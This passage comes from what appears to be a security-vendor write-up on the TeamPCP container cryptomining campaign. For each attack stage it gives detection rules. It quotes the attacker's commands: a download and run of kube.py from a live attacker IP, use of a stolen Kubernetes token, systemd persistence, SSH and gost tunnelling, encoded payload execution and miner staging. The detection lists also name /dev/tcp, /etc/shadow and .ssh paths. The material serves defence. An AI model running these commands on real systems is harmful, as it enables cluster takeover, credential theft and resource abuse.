     &quot;-bash&quot;, &quot;-dash&quot;, &quot;-sh&quot;, &quot;-tcsh&quot;, &quot;-csh&quot;, &quot;-zsh&quot;, &quot;-ksh&quot;, &quot;-fish&quot;,
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;,
     &quot;/bin/bash&quot;, &quot;/bin/dash&quot;, &quot;/bin/sh&quot;, &quot;/bin/tcsh&quot;, &quot;/bin/csh&quot;,
     &quot;/bin/zsh&quot;, &quot;/bin/ksh&quot;, &quot;/bin/fish&quot;,
     &quot;/usr/bin/bash&quot;, &quot;/usr/bin/dash&quot;, &quot;/usr/bin/sh&quot;, &quot;/usr/bin/tcsh&quot;,
     &quot;/usr/bin/csh&quot;, &quot;/usr/bin/zsh&quot;, &quot;/usr/bin/ksh&quot;, &quot;/usr/bin/fish&quot;,
     &quot;-busybox&quot;, &quot;busybox&quot;, &quot;/bin/busybox&quot;, &quot;/usr/bin/busybox&quot;,
     &quot;*python*&quot;, &quot;*perl*&quot;, &quot;*ruby*&quot;, &quot;*lua*&quot;, &quot;*php*&quot;, &quot;/dev/fd/*&quot;
   )]
</code></pre>
<p>This rule detects the download → interpreter execution pattern, even when no file is written to disk. Detecting this step is critical, as it is the first reliable indicator of hands-on-keyboard activity within a container.</p>
<p>Upon execution, TeamPCP scans the target system for competing mining processes and uses the <code>pkill</code> command to terminate them.</p>
<pre><code class="language-shell">pkill -9 xmrig 2&gt;/dev/null || true
pkill -9 XMRig 2&gt;/dev/null || true
curl -fsSL http://update.aegis.aliyun.com/download/uninstall.sh | bash 2&gt;/dev/null || true
</code></pre>
<p>TeamPCP’s competitor-killing logic is notably limited compared with rival cryptomining campaigns, focusing only on <code>xmrig</code>. Manual process killing in containers is uncommon, especially when done via interactive processes.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
container.id like &quot;*?&quot; and 
(
  process.name in (&quot;kill&quot;, &quot;pkill&quot;, &quot;killall&quot;) or
  (
    /*
       Account for tools that execute utilities as a subprocess,
       in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;kill&quot;, &quot;/bin/kill&quot;, &quot;/usr/bin/kill&quot;, &quot;/usr/local/bin/kill&quot;,
      &quot;pkill&quot;, &quot;/bin/pkill&quot;, &quot;/usr/bin/pkill&quot;, &quot;/usr/local/bin/pkill&quot;,
      &quot;killall&quot;, &quot;/bin/killall&quot;, &quot;/usr/bin/killall&quot;, &quot;/usr/local/bin/killall&quot;
    )
  )
)
</code></pre>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml">Payload Execution via Shell Pipe Detected by Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/impact_process_killing.toml">Process Killing Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon initial access:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image4.png" alt="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" title="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" /></p>
<h3>Stage 2 – Kubernetes environment discovery</h3>
<p>After gaining execution, the attacker checks whether the container is running inside Kubernetes by testing for a service account token:</p>
<pre><code class="language-shell">if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]
</code></pre>
<p>This check determines whether the attack can expand beyond the current container. If the token exists, the attacker proceeds to abuse the Kubernetes API. Additionally, the dropped scripts enumerate environment variables and several sensitive file locations, triggering numerous discovery-related alerts.</p>
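<p>When the token exists, the typical next step is to talk to the Kubernetes API directly using the stolen service account identity. The command below illustrates that pattern rather than reproducing TeamPCP’s tooling (<code>kubernetes.default.svc</code> is the standard in-cluster API address):</p>
<pre><code class="language-shell">TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sk -H &quot;Authorization: Bearer ${TOKEN}&quot; \
  https://kubernetes.default.svc/api/v1/pods
</code></pre>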
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml">Service Account Namespace Read Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_environment_enumeration.toml">Environment Variable Enumeration Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml">Service Account Token or Certificate Read Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon discovery:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image9.png" alt="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" title="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" /></p>
<h3>Stage 3 – Lateral movement via <code>kube.py</code></h3>
<p>When a service account token is present, the attacker downloads and executes a Python script designed to enumerate pods and execute commands across the cluster:</p>
<pre><code class="language-shell">curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py
python3 /tmp/k8s.py
</code></pre>
<p>At this point, the attacker’s goal is clear: turn a single compromised container into a foothold for cluster-wide propagation using legitimate Kubernetes APIs.</p>
<p>D4C detects this stage through a combination of file and process telemetry. A script is written to a temporary directory and executed immediately via an interpreter, all within an interactive container session.</p>
<p>An interactive <code>curl</code> command that pulls a file from a remote source is a strong detection signal in already-deployed, long-running container workloads.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    (process.name == &quot;curl&quot; or process.args in (
      &quot;curl&quot;, &quot;/bin/curl&quot;, &quot;/usr/bin/curl&quot;, &quot;/usr/local/bin/curl&quot;
    )
  ) and
    process.args in (
      &quot;-o&quot;, &quot;-O&quot;, &quot;--output&quot;, &quot;--remote-name&quot;,
      &quot;--remote-name-all&quot;, &quot;--output-dir&quot;
    )
  ) or
  (
    (process.name == &quot;wget&quot; or process.args in (
      &quot;wget&quot;, &quot;/bin/wget&quot;, &quot;/usr/bin/wget&quot;, &quot;/usr/local/bin/wget&quot;
    )
  ) and
  process.args like (&quot;-*O*&quot;, &quot;--output-document=*&quot;, &quot;--output-file=*&quot;)
  )
) and (
 process.args like~ &quot;*http*&quot; or
 process.args regex &quot;.*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}[:/]{1}.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>The detection rule above detects the remote file download, but we can go one step further by detecting a sequence for file creation, followed by its execution within the same container context:</p>
<pre><code class="language-sql">sequence by container.id, user.id with maxspan=3s
  [file where host.os.type == &quot;linux&quot; and event.type == &quot;creation&quot; and 
   process.interactive == true and container.id like &quot;?*&quot; and
   file.path like (
     &quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/root/*&quot;, &quot;/home/*&quot;
   ) and
   not process.name in (
     &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;, &quot;apk&quot;,   
     &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
   )] by file.path
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.interactive == true and
   container.id like &quot;?*&quot;] by process.executable
</code></pre>
<p>Here, we focus on interactive processes while excluding files created by package managers, since we expect those to be present in typical workloads.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml">File Creation and Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml">File Download Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon lateral movement:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image10.png" alt="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" title="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" /></p>
<h3>Stage 4 – Establishing persistence via Systemd</h3>
<p>Persistence mechanisms such as systemd services generally make little sense in container environments. Most containers are designed to be short-lived, single-process workloads that rely on the container runtime or orchestrator for lifecycle management. They typically do not run a full init system, and even when systemd is present, changes made inside the container rarely survive redeployment, rescheduling, or image rebuilds.</p>
<p>As a result, attempts to establish persistence via <code>systemd</code> from within a container are a strong indicator of an anomaly. They often indicate one of two things: either the container is running with elevated privileges and access to the host filesystem, or the attacker expects to escape the container boundary and have their persistence mechanism take effect at the node level.</p>
<p>In the TeamPCP campaign, the attacker attempts to establish persistence by creating a <code>systemd</code> service:</p>
<pre><code class="language-shell">cat&gt;/etc/systemd/system/teampcp-react.service&lt;&lt;SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
</code></pre>
<p>This action is not consistent with normal container behavior. Writing systemd unit files from inside a container suggests an intent to persist beyond the container lifecycle, which is only meaningful if the underlying host is affected.</p>
<p>D4C captures this behavior as file creation activity in sensitive system locations originating from a container context. The following detection logic looks for write-oriented file activity in common Linux persistence paths, including systemd services, timers, cron jobs, sudoers files, and shell profile modifications:</p>
<pre><code class="language-sql">file where event.type != &quot;deletion&quot; and
/* open events currently only log file opens with write intent */
event.action in (&quot;creation&quot;, &quot;rename&quot;, &quot;open&quot;) and (
  file.path like (
    // Cron &amp; Anacron Jobs
    &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
    &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;, 
    &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;, 
    &quot;/var/spool/anacron/*&quot;,

    // At Job
    &quot;/var/spool/cron/atjobs/*&quot;, &quot;/var/spool/atjobs/*&quot;,

    // Sudoers
    &quot;/etc/sudoers*&quot;
  ) or
  (
    // Systemd Service/Timer
    file.path like (
      &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
      &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;, 
      &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
      &quot;/home/*/.config/systemd/user/*&quot;, &quot;/home/*/.local/share/systemd/user/*&quot;,
      &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
    ) and
    file.extension in (&quot;service&quot;, &quot;timer&quot;)
  ) or
  (
    // Shell Profile Configuration
    file.path like (&quot;/etc/profile.d/*&quot;, &quot;/etc/zsh/*&quot;) or (
      file.path like (&quot;/home/*/*&quot;, &quot;/etc/*&quot;, &quot;/root/*&quot;) and
      file.name in (
  	 &quot;profile&quot;, &quot;bash.bashrc&quot;, &quot;bash.bash_logout&quot;, &quot;csh.cshrc&quot;,
        &quot;csh.login&quot;, &quot;config.fish&quot;, &quot;ksh.kshrc&quot;, &quot;.bashrc&quot;,
        &quot;.bash_login&quot;, &quot;.bash_logout&quot;, &quot;.bash_profile&quot;, &quot;.bash_aliases&quot;, 
        &quot;.zprofile&quot;, &quot;.zshrc&quot;, &quot;.cshrc&quot;, &quot;.login&quot;, &quot;.logout&quot;, &quot;.kshrc&quot;
      )
    )
  )
) and container.id like &quot;?*&quot; and
not process.name in (
  &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;,
  &quot;apk&quot;, &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
)
</code></pre>
<p>This detection does not focus solely on <code>systemd</code>. Instead, it models persistence more broadly by covering multiple common Linux persistence vectors that attackers may attempt once code execution is achieved. By explicitly excluding package managers, the rule reduces noise from legitimate update and installation activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml">Modification of Persistence Relevant Files Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon persistence:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image5.png" alt="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" title="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" /></p>
<p>When this detection fires in a container context, it is a strong indicator of post-compromise behavior with potential host-level impact. It highlights activity that is not only suspicious but also structurally incompatible with how containers are expected to behave.</p>
<h3>Stage 5 – Installing tooling at runtime</h3>
<p>In Docker-based deployments, the attacker installs required tooling dynamically:</p>
<pre><code class="language-shell">apk add --no-cache curl bash python3
</code></pre>
<p>This allows the same payload to run across different base images without modification.</p>
<p>From a defender’s perspective, runtime package installation inside a container is a strong indicator of post-deployment tampering. D4C detects this through process execution telemetry tied to known package managers.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    process.name in (
      &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;
    ) and process.args == &quot;install&quot;
  ) or
  (process.name == &quot;apk&quot; and process.args == &quot;add&quot;) or
  (process.name == &quot;pacman&quot; and process.args like &quot;-*S*&quot;) or
  (process.name in (&quot;rpm&quot;, &quot;dpkg&quot;) and process.args in (&quot;-i&quot;, &quot;--install&quot;))
) and
process.args like (
  &quot;curl&quot;, &quot;wget&quot;, &quot;socat&quot;, &quot;busybox&quot;, &quot;openssl&quot;, &quot;torsocks&quot;,
  &quot;netcat&quot;, &quot;netcat-openbsd&quot;, &quot;netcat-traditional&quot;, &quot;ncat&quot;, &quot;tor&quot;,
  &quot;python*&quot;, &quot;perl&quot;, &quot;node&quot;, &quot;nodejs&quot;, &quot;ruby&quot;, &quot;lua&quot;, &quot;bash&quot;, &quot;sh&quot;,
  &quot;dash&quot;, &quot;zsh&quot;, &quot;fish&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;ksh&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Not all package installations in containers are malicious: some containers legitimately install packages during startup and orchestration. However, because threat actors routinely use package managers to pull in their tooling, this activity is a strong signal in containers that are already deployed and running.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_tool_installation.toml">Tool Installation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tool installation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image2.png" alt="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" title="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" /></p>
<h3>Stage 6 – Establishing tunneling and proxy access</h3>
<p>Once stable execution and persistence are in place, TeamPCP shifts focus from access to connectivity. At this stage, the attackers deploy tunneling and proxy tooling such as <code>frps</code> and <code>gost</code> to expose internal services and maintain reliable external access.</p>
<p>The purpose of this step is to convert compromised containers into reusable infrastructure. By establishing tunnels or forwarders, the attackers can pivot into other environments, relay traffic, or reuse the compromised workload as part of a larger attack chain.</p>
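<p>For context, the commands produced at this stage resemble the following (hosts are placeholders, and these are illustrative invocations of standard <code>ssh</code> and <code>gost</code> forwarding flags, not TeamPCP’s exact command lines):</p>
<pre><code class="language-shell"># reverse-forward an internal service to an attacker-controlled relay
ssh -fN -R 0.0.0.0:9000:127.0.0.1:80 user@relay.example

# gost: listen locally and chain through an upstream SOCKS5 proxy
gost -L :1080 -F socks5://relay.example:1080
</code></pre>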
<p>D4C detects this activity through process execution telemetry. The execution of known tunneling tools inside containers is uncommon for legitimate workloads and stands out clearly when combined with interactive execution and container context.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    // Tunneling and/or Port Forwarding via process args
    (process.args regex &quot;&quot;&quot;.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}.*&quot;&quot;&quot;) or
    // gost
    (process.name == &quot;gost&quot; and process.args : (&quot;-L*&quot;, &quot;-C*&quot;, &quot;-R*&quot;)) or
    // ssh
    (process.name == &quot;ssh&quot; and (
     process.args like (&quot;-*R*&quot;, &quot;-*L*&quot;, &quot;-*D*&quot;, &quot;-*w*&quot;) and 
     not (process.args == &quot;chmod&quot; or process.args like &quot;*rungencmd*&quot;))
    ) or
    // ssh Tunneling and/or Port Forwarding via SSH option
    (process.name == &quot;ssh&quot; and process.args == &quot;-o&quot; and process.args like~(
      &quot;*ProxyCommand*&quot;, &quot;*LocalForward*&quot;, &quot;*RemoteForward*&quot;,
      &quot;*DynamicForward*&quot;, &quot;*Tunnel*&quot;, &quot;*GatewayPorts*&quot;, 
      &quot;*ExitOnForwardFailure*&quot;, &quot;*ProxyJump*&quot;
      )
    ) or
    // sshuttle
    (process.name == &quot;sshuttle&quot; and
     process.args in (&quot;-r&quot;, &quot;--remote&quot;, &quot;-l&quot;, &quot;--listen&quot;)
    ) or
    // earthworm
    (process.args == &quot;-s&quot; and process.args == &quot;-d&quot; and
     process.args == &quot;rssocks&quot;
    ) or
    // socat
    (process.name == &quot;socat&quot; and
     process.args like~ (&quot;TCP4-LISTEN:*&quot;, &quot;SOCKS*&quot;)
    ) or
    // chisel
    (process.name like~ &quot;chisel*&quot; and process.args in (&quot;client&quot;, &quot;server&quot;)) or
    // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy &amp; ngrok 
    (process.name in (
      &quot;iodine&quot;, &quot;iodined&quot;, &quot;dnscat&quot;, &quot;hans&quot;, &quot;hans-ubuntu&quot;, &quot;ptunnel-ng&quot;,
      &quot;ssf&quot;, &quot;3proxy&quot;, &quot;ngrok&quot;, &quot;wstunnel&quot;, &quot;pivotnacci&quot;, &quot;frps&quot;, 
      &quot;proxychains&quot;
      )
    )
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many tunneling and port forwarding tools available on Linux systems. The umbrella rule displayed above leverages a combination of regex, process names, and process arguments to detect commonly observed tunneling activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml">Tunneling and/or Port Forwarding Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tunneling and proxy access:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image8.png" alt="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" title="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" /></p>
<p>Detecting tunneling is important because it often marks the transition from short-lived compromise to sustained attacker presence. When correlated with earlier stages, it provides strong confirmation of intentional, ongoing abuse rather than opportunistic execution.</p>
<h3>Stage 7 – Encoded payload execution</h3>
<p>To obscure payload logic, the attacker executes a base64-encoded payload directly via Python:</p>
<pre><code class="language-shell">python3 -c &quot;import base64; exec(base64.b64decode('&lt;payload&gt;').decode())&quot;
</code></pre>
<p>This technique reduces visibility into the payload itself but introduces distinctive execution characteristics: encoded arguments passed directly to an interpreter in an interactive session.</p>
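<p>The pattern is easy to reproduce benignly for rule validation. The snippet below decodes a harmless stand-in payload (<code>print(&quot;hi&quot;)</code>) and pipes it straight into the interpreter, exercising the same decode-then-execute characteristics:</p>
<pre><code class="language-shell"># cHJpbnQoImhpIik= is the base64 encoding of: print(&quot;hi&quot;)
echo cHJpbnQoImhpIik= | base64 -d | python3
</code></pre>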
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (process.name in (
    &quot;base64&quot;, &quot;base64plain&quot;, &quot;base64url&quot;, &quot;base64mime&quot;, &quot;base64pem&quot;,
    &quot;base32&quot;, &quot;base16&quot;
    ) and process.args like~ &quot;*-*d*&quot;
  ) or
  (process.name == &quot;xxd&quot; and process.args like~ (&quot;-*r*&quot;, &quot;-*p*&quot;)) or
  (process.name == &quot;openssl&quot; and process.args == &quot;enc&quot; and
   process.args in (&quot;-d&quot;, &quot;-base64&quot;, &quot;-a&quot;)
  ) or
  (process.name like &quot;python*&quot; and (
    (process.args == &quot;base64&quot; and process.args in (&quot;-d&quot;, &quot;-u&quot;, &quot;-t&quot;)) or
    (process.args == &quot;-c&quot; and process.args like &quot;*base64*&quot; and
     process.args like &quot;*b64decode*&quot;)
    )
  ) or
  (process.name like &quot;perl*&quot; and process.args like &quot;*decode_base64*&quot;) or
  (process.name like &quot;ruby*&quot; and process.args == &quot;-e&quot; and
   process.args like &quot;*Base64.decode64*&quot;
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many ways to decode a payload, but the umbrella rule shown above captures the most commonly observed techniques.</p>
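Once an alert fires on the <code>python3 -c</code> pattern, an analyst typically wants to see the decoded payload. The hypothetical helper below (not part of the detection rule) pulls the base64 string out of such a command line and decodes it for review:

```python
import base64
import re
import shlex

def extract_b64_payload(cmdline: str):
    """Best-effort triage helper: extract and decode the base64 string
    from a `python3 -c "exec(base64.b64decode('...').decode())"` command
    line. Returns None when the pattern is not present."""
    args = shlex.split(cmdline)
    if "-c" not in args:
        return None
    i = args.index("-c")
    if i + 1 >= len(args):
        return None
    match = re.search(r"b64decode\(['\"]([A-Za-z0-9+/=]+)['\"]\)", args[i + 1])
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-8", errors="replace")

encoded = base64.b64encode(b"print('hi')").decode()
cmd = f"python3 -c \"exec(base64.b64decode('{encoded}').decode())\""
print(extract_b64_payload(cmd))  # print('hi')
```

Surfacing the decoded payload next to the alert shortens triage considerably, since the analyst no longer has to decode the argument by hand.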
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml">Encoded Payload Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml">Suspicious Interpreter Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml">Decoded Payload Piped to Interpreter Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon execution:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image12.png" alt="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" title="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" /></p>
<h3>Stage 8 – Miner deployment and execution</h3>
<p>Eventually, the attacker reconstructs a miner from base64, writes it to disk, makes it executable, and launches it:</p>
<pre><code class="language-shell">/bin/sh -c &quot;printf IyEvYmlu&lt;&lt;TRUNCATED&gt;&gt;&gt;***** &gt;&gt; /tmp/miner.b64&quot;
/bin/sh -c &quot;base64 -d /tmp/miner.b64 &gt; /tmp/miner &amp;&amp; chmod +x /tmp/miner &amp;&amp; rm /tmp/miner.b64&quot;
</code></pre>
<p>This stage represents the shift from setup to monetization. The attacker is now actively abusing cluster resources.</p>
<p>As mentioned previously, D4C will detect the decoding of the base64 payload using the same rule linked in the previous stage. Three other important signals are the creation of a base64-encoded payload, file permission changes in specific directories, and the execution of newly created binaries in temporary directories.</p>
<p>For the creation of base64-encoded payloads, an umbrella rule was created that detects the execution of a shell using the echo/printf built-ins in combination with a list of commonly abused command-line patterns:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.interactive == true and process.name in (
  &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;
) and process.args == &quot;-c&quot; and process.args like (&quot;*echo *&quot;, &quot;*printf *&quot;) and 
process.args like (
  &quot;*/etc/cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;,
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/ld.so*&quot;, &quot;*/etc/sudoers*&quot;, &quot;*base64 *&quot;, 
  &quot;*base32 *&quot;, &quot;*base16 *&quot;, &quot;*/etc/profile*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/etc/ssh*&quot;, 
  &quot;*/home/*/.ssh/*&quot;, &quot;*/root/.ssh*&quot; , &quot;*~/.ssh/*&quot;, &quot;*xxd *&quot;, &quot;*/etc/shadow*&quot;,
  &quot;* /tmp/*&quot;, &quot;* /var/tmp/*&quot;, &quot;* /dev/shm/* &quot;, &quot;* ~/*&quot;, &quot;* /home/*&quot;,
  &quot;* /run/*&quot;, &quot;* /var/run/*&quot;, &quot;*|*sh&quot;, &quot;*|*python*&quot;, &quot;*|*php*&quot;, &quot;*|*perl*&quot;,
  &quot;*|*busybox*&quot;, &quot;*/var/www/*&quot;, &quot;*&gt;*&quot;, &quot;*;*&quot;, &quot;*chmod *&quot;, &quot;*rm *&quot; 
) and container.id like &quot;?*&quot;
</code></pre>
<p>Especially for interactive processes, the rule shown above is a high-signal detection.</p>
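The shell-with-suspicious-pattern logic can be emulated with Python's <code>fnmatch</code> module, which supports the same <code>*</code> wildcards the EQL <code>like</code> operator uses. The sketch below is a simplified illustration using only a subset of the rule's pattern list:

```python
from fnmatch import fnmatchcase

SHELLS = {"bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"}
# Subset of the suspicious patterns from the rule above, for illustration.
SUSPICIOUS_PATTERNS = ["*base64 *", "*/etc/cron*", "* /tmp/*", "*chmod *"]

def suspicious_echo_printf(name: str, args: list) -> bool:
    """Mirror the EQL logic: an interactive shell invoked with -c whose
    command string uses echo/printf and matches a suspicious pattern."""
    if name not in SHELLS or "-c" not in args:
        return False
    i = args.index("-c")
    cmd = args[i + 1] if i + 1 < len(args) else ""
    uses_builtin = fnmatchcase(cmd, "*echo *") or fnmatchcase(cmd, "*printf *")
    return uses_builtin and any(fnmatchcase(cmd, p) for p in SUSPICIOUS_PATTERNS)

# The miner-staging command from stage 8 matches both conditions:
print(suspicious_echo_printf(
    "sh", ["-c", "printf IyEvYmlu >> /tmp/miner.b64"]))  # True
```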
<p>The second piece of the flow relates to file permission changes. Not all file permission changes are malicious, but permission changes to executable files in world-writable directories, made by an interactive process within a container, are not expected to occur frequently.</p>
<pre><code class="language-sql">any where event.category in (&quot;file&quot;, &quot;process&quot;) and
event.type in (&quot;change&quot;, &quot;creation&quot;, &quot;start&quot;) and (
  process.name == &quot;chmod&quot; or
  (
    /*
    account for tools that execute utilities as a subprocess,
    in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;chmod&quot;, &quot;/bin/chmod&quot;, &quot;/usr/bin/chmod&quot;, &quot;/usr/local/bin/chmod&quot;
    )
  )
) and process.args in (&quot;4755&quot;, &quot;755&quot;, &quot;777&quot;, &quot;0777&quot;, &quot;444&quot;, &quot;+x&quot;, &quot;a+x&quot;) and
container.id like &quot;?*&quot;
</code></pre>
<p>Note that we leverage the file and process event categories here. The reason for this is that D4C captures these changes through file events if set specifically in the policy, but by default will capture these process executions when set to detect <code>execve</code> calls.</p>
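The rule above matches a fixed list of commonly observed mode arguments. A more general (though simplified) approach is to parse the mode itself and check whether it grants execution; the helper below is a hypothetical illustration, not exhaustive chmod grammar, and note that the rule also watches non-execute modes such as <code>444</code> used to lock files read-only:

```python
def grants_execute(mode_arg: str) -> bool:
    """Return True if a chmod argument adds or sets an execute bit.
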